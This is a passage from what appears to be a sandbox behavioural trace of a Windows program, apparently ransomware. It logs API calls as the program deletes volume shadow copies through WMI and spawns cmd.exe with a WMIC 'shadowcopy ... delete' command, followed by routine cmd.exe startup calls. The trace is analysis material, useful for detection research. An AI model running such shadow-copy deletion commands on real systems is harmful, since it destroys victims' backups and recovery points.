(_Block=0x45d080) [0111.851] LocalFree (hMem=0x1ab690) returned 0x0 [0111.851] IWbemServices:DeleteInstance (in: This=0x1de3c18, strObjectPath="\\\\XDUWTFONO\\ROOT\\CIMV2:Win32_ShadowCopy.ID=\"{1EE90775-4E53-4C29-811E-F4996057D94E}\"", lFlags=0, pCtx=0x0, ppCallResult=0x0 | out: ppCallResult=0x0) returned 0x0 [0113.285] IUnknown:Release (This=0x1de3d80) returned 0x0 [0113.285] malloc (_Size=0x800) returned 0x45d080 [0113.285] LoadStringW (in: hInstance=0x0, uID=0xb09e, lpBuffer=0x45d080, cchBufferMax=1024 | out: lpBuffer="Instance deletion successful.\r\n") returned 0x1f [0113.285] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0113.285] malloc (_Size=0x20) returned 0x45cef0 [0113.285] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Instance deletion successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x45cef0, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Instance deletion successful.\r\n", lpUsedDefaultChar=0x0) returned 32 [0113.286] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xff522ab0 [0113.286] fprintf (in: _File=0x7fefdf72ab0, _Format="%s" | out: _File=0x7fefdf72ab0) returned 31 [0113.286] fflush (in: _File=0x7fefdf72ab0 | out: _File=0x7fefdf72ab0) returned 0 [0113.286] free (_Block=0x45cef0) [0113.286] free (_Block=0x45d080) [0113.286] IEnumWbemClassObject:Next (in: This=0x1de3d18, lTimeout=-1, uCount=0x1, apObjects=0xaf490, puReturned=0xaf4a0 | out: apObjects=0xaf490*=0x0, puReturned=0xaf4a0*=0x0) returned 0x1 [0113.288] IUnknown:Release (This=0x1de3d18) returned 0x0 [0113.289] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.289] free (_Block=0x45cca0) [0113.290] free (_Block=0x45ccc0) [0113.290] GetCurrentThreadId () returned 0xb08 [0113.290] ??0CHString@@QEAA@PEBG@Z () returned 0xaf668 [0113.290] ??YCHString@@QEAAAEBV0@PEBG@Z () returned 0xaf668 [0113.290] lstrlenW (lpString="LIST") returned 4 [0113.290] lstrlenW (lpString="delete") returned 6 [0113.290] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="LIST", cchCount2=4) returned 1 [0113.290] lstrlenW (lpString="ASSOC") returned 5 [0113.290] lstrlenW (lpString="delete") returned 6 [0113.290] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3 [0113.290] lstrlenW (lpString="GET") returned 3 [0113.290] lstrlenW (lpString="delete") returned 6 [0113.290] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="delete", cchCount1=6, lpString2="GET", cchCount2=3) returned 1 [0113.290] ??1CHString@@QEAA@XZ () returned 0x4cd87701 [0113.290] WbemLocator:IUnknown:Release (This=0x1de3c18) returned 0x0 [0113.291] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0113.291] _kbhit () returned 0x0 [0113.291] free (_Block=0x456f20) [0113.291] free (_Block=0x45cac0) [0113.291] free (_Block=0x45caa0) [0113.291] free (_Block=0x45ca80) [0113.291] free (_Block=0x45ca60) [0113.292] free (_Block=0x4570a0) [0113.292] free (_Block=0x45cb40) [0113.292] free (_Block=0x4585c0) [0113.292] free (_Block=0x45d020) [0113.292] free (_Block=0x45cbc0) [0113.292] free (_Block=0x45cfa0) [0113.292] free (_Block=0x45cae0) [0113.292] free (_Block=0x45cbe0) [0113.292] free (_Block=0x457140) [0113.292] free (_Block=0x456e00) [0113.292] free (_Block=0x45cff0) [0113.292] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0113.292] free (_Block=0x45ce20) [0113.292] free (_Block=0x45cb00) [0113.292] free (_Block=0x45cb20) [0113.292] free (_Block=0x45cf30) [0113.292] free (_Block=0x45cb60) [0113.292] free (_Block=0x457ee0) [0113.292] free (_Block=0x457f30) [0113.292] free (_Block=0x457f80) [0113.292] free (_Block=0x45cb80) [0113.292] free (_Block=0x456a20) [0113.292] free (_Block=0x456de0) [0113.292] free (_Block=0x458040) [0113.292] free (_Block=0x456dc0) [0113.293] free (_Block=0x458000) [0113.293] free (_Block=0x456d60) [0113.293] free (_Block=0x456d80) [0113.293] free (_Block=0x456c40) [0113.293] free (_Block=0x456c60) [0113.293] free (_Block=0x456be0) [0113.293] free (_Block=0x456c00) [0113.293] free (_Block=0x456ca0) [0113.293] free (_Block=0x456cc0) [0113.293] free (_Block=0x456d00) [0113.293] free (_Block=0x456d20) [0113.293] free (_Block=0x456b20) [0113.293] free (_Block=0x456b40) [0113.293] free (_Block=0x456ac0) [0113.293] free (_Block=0x456ae0) [0113.293] free (_Block=0x456b80) [0113.293] free (_Block=0x456ba0) [0113.293] free (_Block=0x456a60) [0113.293] free (_Block=0x456a80) [0113.293] free (_Block=0x4569d0) [0113.294] free (_Block=0x4569a0) [0113.294] free (_Block=0x456e90) [0113.294] WbemLocator:IUnknown:Release (This=0x1dd1390) returned 0x2 [0113.294] WbemLocator:IUnknown:Release (This=0x1de3b28) returned 0x0 [0113.294] WbemLocator:IUnknown:Release (This=0x1de3a98) returned 0x0 [0113.294] WbemLocator:IUnknown:Release (This=0x1dd1390) returned 0x1 [0113.294] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0113.295] WbemLocator:IUnknown:Release (This=0x1dd1390) returned 0x0 [0113.295] free (_Block=0x45c9e0) [0113.295] free (_Block=0x45ca00) [0113.295] free (_Block=0x458540) [0113.295] free (_Block=0x45ca20) [0113.295] free (_Block=0x45ca40) [0113.295] free (_Block=0x458580) [0113.295] free (_Block=0x45c860) [0113.295] free (_Block=0x45c880) [0113.295] free (_Block=0x4583c0) [0113.295] free (_Block=0x45c8a0) [0113.295] free (_Block=0x45c8c0) [0113.295] free (_Block=0x458400) [0113.295] free (_Block=0x45c7e0) [0113.295] free (_Block=0x45c800) [0113.295] free (_Block=0x458340) [0113.295] free (_Block=0x45c820) [0113.295] free (_Block=0x45c840) [0113.295] free (_Block=0x458380) [0113.296] free (_Block=0x45c960) [0113.296] free (_Block=0x45c980) [0113.296] free (_Block=0x4584c0) [0113.296] free (_Block=0x45c9a0) [0113.296] free (_Block=0x45c9c0) [0113.296] free (_Block=0x458500) [0113.296] free (_Block=0x45c760) [0113.296] free (_Block=0x45c780) [0113.296] free (_Block=0x4582c0) [0113.296] free (_Block=0x45c7a0) [0113.296] free (_Block=0x45c7c0) [0113.296] free (_Block=0x458300) [0113.296] free (_Block=0x45c8e0) [0113.296] free (_Block=0x45c900) [0113.296] free (_Block=0x458440) [0113.296] free (_Block=0x45c920) [0113.296] free (_Block=0x45c940) [0113.296] free (_Block=0x458480) [0113.296] free (_Block=0x45c6a0) [0113.297] free (_Block=0x45c6c0) [0113.297] free (_Block=0x458200) [0113.297] free (_Block=0x45c560) [0113.297] free (_Block=0x45c580) [0113.297] free (_Block=0x4580c0) [0113.297] free (_Block=0x456e50) [0113.297] free (_Block=0x456e70) [0113.297] free (_Block=0x458080) [0113.297] free (_Block=0x45c5e0) [0113.297] free (_Block=0x45c600) [0113.297] free (_Block=0x458140) [0113.297] free (_Block=0x45c6e0) [0113.297] free (_Block=0x45c700) [0113.297] free (_Block=0x458240) [0113.297] free (_Block=0x45c5a0) [0113.297] free (_Block=0x45c5c0) [0113.297] free (_Block=0x458100) [0113.297] free (_Block=0x45c620) [0113.298] free (_Block=0x45c640) [0113.298] free (_Block=0x458180) [0113.298] free (_Block=0x45c660) [0113.298] free (_Block=0x45c680) [0113.298] free (_Block=0x4581c0) [0113.298] free (_Block=0x45c720) [0113.298] free (_Block=0x45c740) [0113.298] free (_Block=0x458280) [0113.298] CoUninitialize () [0113.321] exit (_Code=0) [0113.321] free (_Block=0x45cd30) [0113.321] free (_Block=0x457ea0) [0113.321] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.321] free (_Block=0x456f40) [0113.321] free (_Block=0x456a40) [0113.321] free (_Block=0x457e60) [0113.321] free (_Block=0x457e20) [0113.321] free (_Block=0x457dd0) [0113.321] free (_Block=0x457d90) [0113.321] free (_Block=0x457d30) [0113.321] free (_Block=0x455a90) [0113.322] free (_Block=0x455a50) [0113.322] ??1CHString@@QEAA@XZ () returned 0x7fef4af482c [0113.322] free (_Block=0x45cec0) Thread: id = 209 os_tid = 0x124 Thread: id = 210 os_tid = 0x760 Thread: id = 211 os_tid = 0xa10 Thread: id = 212 os_tid = 0x644 Thread: id = 213 os_tid = 0x72c Process: id = "38" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7131c000" os_pid = "0x348" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xaec" cmd_line = "cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 215 os_tid = 0xa6c [0113.422] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fc70 | out: lpSystemTimeAsFileTime=0x12fc70*(dwLowDateTime=0x4b2a2d90, dwHighDateTime=0x1d68245)) [0113.422] GetCurrentProcessId () returned 0x348 [0113.422] GetCurrentThreadId () returned 0xa6c [0113.422] GetTickCount () returned 0x1151f92 [0113.422] QueryPerformanceCounter (in: lpPerformanceCount=0x12fc78 | out: lpPerformanceCount=0x12fc78*=23331510602) returned 1 [0113.425] GetModuleHandleW (lpModuleName=0x0) returned 0x4a4f0000 [0113.425] __set_app_type (_Type=0x1) [0113.425] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a517810) returned 0x0 [0113.426] __getmainargs (in: _Argc=0x4a53a608, _Argv=0x4a53a618, _Env=0x4a53a610, _DoWildCard=0, _StartInfo=0x4a51e0f4 | out: _Argc=0x4a53a608, _Argv=0x4a53a618, _Env=0x4a53a610) returned 0 [0113.426] GetCurrentThreadId () returned 0xa6c [0113.426] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa6c) returned 0x3c [0113.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0113.426] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0113.426] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.427] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.427] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12fc08 | out: phkResult=0x12fc08*=0x0) returned 0x2 [0113.427] VirtualQuery (in: lpAddress=0x12fbf0, lpBuffer=0x12fb70, dwLength=0x30 | out: lpBuffer=0x12fb70*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.427] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12fb70, dwLength=0x30 | out: lpBuffer=0x12fb70*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.427] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12fb70, dwLength=0x30 | out: lpBuffer=0x12fb70*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.427] VirtualQuery (in: lpAddress=0x34000, lpBuffer=0x12fb70, dwLength=0x30 | out: lpBuffer=0x12fb70*(BaseAddress=0x34000, AllocationBase=0x30000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0113.427] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12fb70, dwLength=0x30 | out: lpBuffer=0x12fb70*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0113.427] GetConsoleOutputCP () returned 0x1b5 [0113.427] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1 [0113.428] SetConsoleCtrlHandler (HandlerRoutine=0x4a513184, Add=1) returned 1 [0113.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.428] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0113.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.428] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a51e194 | out: lpMode=0x4a51e194) returned 1 [0113.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0113.428] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0113.429] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.429] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a51e198 | out: lpMode=0x4a51e198) returned 1 [0113.429] _get_osfhandle (_FileHandle=0) returned 0x3 [0113.429] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0113.429] GetEnvironmentStringsW () returned 0x258b90* [0113.429] GetProcessHeap () returned 0x240000 [0113.429] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa7c) returned 0x259620 [0113.429] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0113.429] GetProcessHeap () returned 0x240000 [0113.429] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x8) returned 0x258a10 [0113.430] GetEnvironmentStringsW () returned 0x258b90* [0113.430] GetProcessHeap () returned 0x240000 [0113.430] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa7c) returned 0x25a0b0 [0113.430] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0113.430] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eac8 | out: phkResult=0x12eac8*=0x44) returned 0x0 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x0, lpData=0x12eae0*=0x18, lpcbData=0x12eac4*=0x1000) returned 0x2 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x1, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x0, lpData=0x12eae0*=0x1, lpcbData=0x12eac4*=0x1000) returned 0x2 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x0, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x40, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x40, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.430] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x0, lpData=0x12eae0*=0x40, lpcbData=0x12eac4*=0x1000) returned 0x2 [0113.430] RegCloseKey (hKey=0x44) returned 0x0 [0113.430] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12eac8 | out: phkResult=0x12eac8*=0x44) returned 0x0 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x0, lpData=0x12eae0*=0x40, lpcbData=0x12eac4*=0x1000) returned 0x2 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x1, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x0, lpData=0x12eae0*=0x1, lpcbData=0x12eac4*=0x1000) returned 0x2 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x0, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x9, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x4, lpData=0x12eae0*=0x9, lpcbData=0x12eac4*=0x4) returned 0x0 [0113.431] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12eac0, lpData=0x12eae0, lpcbData=0x12eac4*=0x1000 | out: lpType=0x12eac0*=0x0, lpData=0x12eae0*=0x9, lpcbData=0x12eac4*=0x1000) returned 0x2 [0113.431] RegCloseKey (hKey=0x44) returned 0x0 [0113.431] time (in: timer=0x0 | out: timer=0x0) returned 0x5f517455 [0113.431] srand (_Seed=0x5f517455) [0113.431] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" [0113.431] GetCommandLineW () returned="cmd.exe /c C:\\Windows\\System32\\wbem\\WMIC.exe shadowcopy where \"ID='{DC780020-7243-4B55-80A9-4BA6EE67823B}'\" delete" [0113.431] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a52c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.432] GetProcessHeap () returned 0x240000 [0113.432] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x218) returned 0x25ab40 [0113.432] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x25ab50, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0113.432] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0113.432] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.432] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.432] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0113.432] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0113.432] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0113.432] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0113.432] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0113.432] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0113.432] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0113.432] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0113.432] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0113.432] GetProcessHeap () returned 0x240000 [0113.432] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x259620 | out: hHeap=0x240000) returned 1 [0113.432] GetEnvironmentStringsW () returned 0x258b90* [0113.432] GetProcessHeap () returned 0x240000 [0113.432] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xa94) returned 0x25ad60 [0113.433] FreeEnvironmentStringsW (penv=0x258b90) returned 1 [0113.433] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.433] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.433] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0113.433] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0113.433] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0113.433] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0113.433] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0113.433] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0113.433] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0113.433] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0113.433] GetProcessHeap () returned 0x240000 [0113.433] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x5c) returned 0x25b800 [0113.433] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x12f8d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.433] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x12f8d0, lpFilePart=0x12f8b0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x12f8b0*="Desktop") returned 0x25 [0113.433] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0113.434] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x12f5e0 | out: lpFindFileData=0x12f5e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x25b870 [0113.434] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0113.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x12f5e0 | out: lpFindFileData=0x12f5e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x25b870 [0113.434] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0113.434] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0113.434] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x12f5e0 | out: lpFindFileData=0x12f5e0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2516f480, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x2516f480, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x25b870 [0113.434] FindClose (in: hFindFile=0x25b870 | out: hFindFile=0x25b870) returned 1 [0113.434] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0113.435] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0113.435] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0113.435] GetProcessHeap () returned 0x240000 [0113.435] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ad60 | out: hHeap=0x240000) returned 1 [0113.435] GetEnvironmentStringsW () returned 0x25b870* [0113.435] GetProcessHeap () returned 0x240000 [0113.435] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xae8) returned 0x25c360 [0113.435] FreeEnvironmentStringsW (penv=0x25b870) returned 1 [0113.435] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a52c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.435] GetProcessHeap () returned 0x240000 [0113.435] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25b800 | out: hHeap=0x240000) returned 1 [0113.435] GetProcessHeap () returned 0x240000 [0113.435] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0x4016) returned 0x25ce50 [0113.436] GetProcessHeap () returned 0x240000 [0113.436] RtlAllocateHeap (HeapHandle=0x240000, Flags=0x8, Size=0xe4) returned 0x259680 [0113.436] GetProcessHeap () returned 0x240000 [0113.436] HeapFree (in: hHeap=0x240000, dwFlags=0x0, lpMem=0x25ce50 | out: hHeap=0x240000) returned 1 [0113.436] GetConsoleOutputCP () returned 0x1b5 [0113.436] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a52bfe0 | out: lpCPInfo=0x4a52bfe0) returned 1 [0113.436] GetUserDefaultLCID () returned 0x409 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a527b50, cchData=8 | out: lpLCData=":") returned 2 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x12f9e0, cchData=128 | out: lpLCData="0") returned 2 [0113.437] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x12f9e0, cchData=128 | out: lpLCData="0") returned 